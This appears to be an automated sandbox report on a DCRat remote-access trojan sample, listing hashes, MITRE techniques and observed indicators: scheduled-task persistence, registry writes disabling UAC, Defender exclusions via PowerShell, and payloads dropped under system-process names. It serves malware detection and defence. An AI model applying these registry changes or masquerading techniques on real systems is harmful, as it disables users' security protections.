dcrat | 6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18

Analysis

max time kernel
149s
max time network
145s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
04-11-2024 23:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
Size

4.9MB
MD5

9fd149523fb2483c3541e7efc6ac71eb
SHA1

454b165a30c8da28b9f16212addaeb214d8fb77d
SHA256

6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18
SHA512

84f619c3f3d4cdc7fe5ceb12185f39f04ba84ca34b6f8b66cb34f8bfc418542090dec9c4fa8a045c8b45374f4fa36af8150e4fee2d22724392397b53570cee9a
SSDEEP

49152:jl5MTGChZpxtlBBgxchXb/zqP6DUtRgs5q289dAnSz44hnW1XgnYu6fYmPkMSx8E:

Score

10^/10

dcrat evasion execution infostealer rat trojan

Malware Config

Signatures

DcRat 64 IoCs

DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

rat infostealer dcrat

Processes:

schtasks.exe6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
2132	schtasks.exe
File created	C:\Program Files (x86)\Google\886983d96e3d3e	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
2280	schtasks.exe
2184	schtasks.exe
2524	schtasks.exe
2756	schtasks.exe
2772	schtasks.exe
1976	schtasks.exe
2636	schtasks.exe
2828	schtasks.exe
1856	schtasks.exe
2052	schtasks.exe
1924	schtasks.exe
1156	schtasks.exe
2128	schtasks.exe
2940	schtasks.exe
1684	schtasks.exe
2140	schtasks.exe
2080	schtasks.exe
2032	schtasks.exe
3012	schtasks.exe
1712	schtasks.exe
1844	schtasks.exe
2428	schtasks.exe
1940	schtasks.exe
2432	schtasks.exe
544	schtasks.exe
1292	schtasks.exe
2808	schtasks.exe
2860	schtasks.exe
2888	schtasks.exe
1712	schtasks.exe
1528	schtasks.exe
1836	schtasks.exe
2644	schtasks.exe
1248	schtasks.exe
2548	schtasks.exe
2656	schtasks.exe
2540	schtasks.exe
1520	schtasks.exe
1756	schtasks.exe
2028	schtasks.exe
1588	schtasks.exe
792	schtasks.exe
2780	schtasks.exe
File created	C:\Program Files (x86)\Windows Sidebar\c5b4cb5e9653cc	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
2648	schtasks.exe
2828	schtasks.exe
1772	schtasks.exe
1220	schtasks.exe
532	schtasks.exe
2664	schtasks.exe
3028	schtasks.exe
2996	schtasks.exe
2928	schtasks.exe
2820	schtasks.exe
1496	schtasks.exe
1792	schtasks.exe
2252	schtasks.exe
File created	C:\Program Files (x86)\Windows Photo Viewer\ja-JP\101b941d020240	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
1412	schtasks.exe
2792	schtasks.exe
File created	C:\Windows\SchCache\c5b4cb5e9653cc	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe

Dcrat family
dcrat

Process spawned unexpected child process 64 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2820	2356	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2828	2356	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3028	2356	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2928	2356	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2648	2356	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2432	2356	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2636	2356	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2780	2356	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2724	2356	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2664	2356	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2028	2356	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1412	2356	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1220	2356	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1424	2356	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	800	2356	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1256	2356	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2940	2356	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	596	2356	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1684	2356	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1712	2356	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	532	2356	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1528	2356	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2140	2356	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2036	2356	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1408	2356	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1756	2356	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2996	2356	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2132	2356	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1976	2356	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1992	2356	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1856	2356	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1496	2356	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2052	2356	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2080	2356	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	544	2356	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1660	2356	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	956	2356	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2280	2356	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1588	2356	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	356	2356	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2032	2356	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1988	2356	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2472	2356	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1792	2356	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1292	2356	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1924	2356	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1836	2356	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2644	2356	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1248	2356	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1916	2356	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2808	2356	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2636	2356	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2040	2356	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3012	2356	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2824	2356	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2548	2356	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2324	2356	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1712	2356	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	676	2356	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1844	2356	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2992	2356	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2184	2356	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2428	2356	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2524	2356	schtasks.exe

UAC bypass 3 TTPs 42 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

lsass.exelsass.exelsass.exelsass.exelsass.exe6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exelsass.exelsass.exelsass.exelsass.exe6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exelsass.exelsass.exelsass.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	lsass.exe

DCRat payload 1 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
behavioral1/memory/292-3-0x000000001B590000-0x000000001B6BE000-memory.dmp	dcrat

Command and Scripting Interpreter: PowerShell 1 TTPs 24 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
1932	powershell.exe
2856	powershell.exe
2264	powershell.exe
2008	powershell.exe
2032	powershell.exe
792	powershell.exe
1912	powershell.exe
2532	powershell.exe
1704	powershell.exe
1720	powershell.exe
2568	powershell.exe
2500	powershell.exe
2164	powershell.exe
2688	powershell.exe
1988	powershell.exe
1540	powershell.exe
2156	powershell.exe
2160	powershell.exe
1752	powershell.exe
3060	powershell.exe
2596	powershell.exe
2700	powershell.exe
3064	powershell.exe
2136	powershell.exe

Executes dropped EXE 13 IoCs

Processes:

6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exelsass.exelsass.exelsass.exelsass.exelsass.exelsass.exelsass.exelsass.exelsass.exelsass.exelsass.exelsass.exe

pid	process
2332	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
292	lsass.exe
960	lsass.exe
2464	lsass.exe
1416	lsass.exe
2332	lsass.exe
2612	lsass.exe
1424	lsass.exe
1788	lsass.exe
2088	lsass.exe
1564	lsass.exe
1932	lsass.exe
1992	lsass.exe

Checks whether UAC is enabled 1 TTPs 28 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

lsass.exelsass.exelsass.exe6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exelsass.exelsass.exelsass.exelsass.exelsass.exelsass.exe6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exelsass.exelsass.exelsass.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	lsass.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	lsass.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	lsass.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	lsass.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	lsass.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	lsass.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	lsass.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	lsass.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	lsass.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	lsass.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	lsass.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	lsass.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	lsass.exe

Drops file in Program Files directory 46 IoCs

Processes:

6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe

description	ioc	process
File opened for modification	C:\Program Files\Windows Defender\csrss.exe	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
File created	C:\Program Files (x86)\MSBuild\Microsoft\dwm.exe	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
File created	C:\Program Files\Windows Journal\de-DE\services.exe	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
File opened for modification	C:\Program Files\Windows Portable Devices\spoolsv.exe	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
File created	C:\Program Files\Microsoft Games\Chess\de-DE\6203df4a6bafc7	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
File created	C:\Program Files (x86)\Windows Sidebar\services.exe	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
File created	C:\Program Files (x86)\Windows Sidebar\c5b4cb5e9653cc	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
File created	C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\cc11b995f2a76d	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
File opened for modification	C:\Program Files\Microsoft Games\Hearts\services.exe	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
File created	C:\Program Files (x86)\MSBuild\Microsoft\6cb0b6c459d5d3	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
File created	C:\Program Files (x86)\Windows Photo Viewer\ja-JP\lsm.exe	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
File created	C:\Program Files (x86)\Windows Photo Viewer\ja-JP\101b941d020240	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
File opened for modification	C:\Program Files (x86)\Google\RCXC186.tmp	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
File created	C:\Program Files\Windows Portable Devices\spoolsv.exe	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
File opened for modification	C:\Program Files\Windows Journal\de-DE\services.exe	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\services.exe	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
File created	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\winlogon.exe	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
File created	C:\Program Files\Windows Defender\csrss.exe	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
File created	C:\Program Files\Microsoft Games\Hearts\c5b4cb5e9653cc	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
File opened for modification	C:\Program Files (x86)\Windows Photo Viewer\ja-JP\lsm.exe	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
File created	C:\Program Files\Windows Portable Devices\WmiPrvSE.exe	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\RCXBF82.tmp	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\winlogon.exe	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
File created	C:\Program Files\Windows Photo Viewer\fr-FR\42af1c969fbb7b	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
File created	C:\Program Files\Windows Portable Devices\24dbde2999530e	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
File created	C:\Program Files\Windows Portable Devices\f3b6ecef712a24	6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
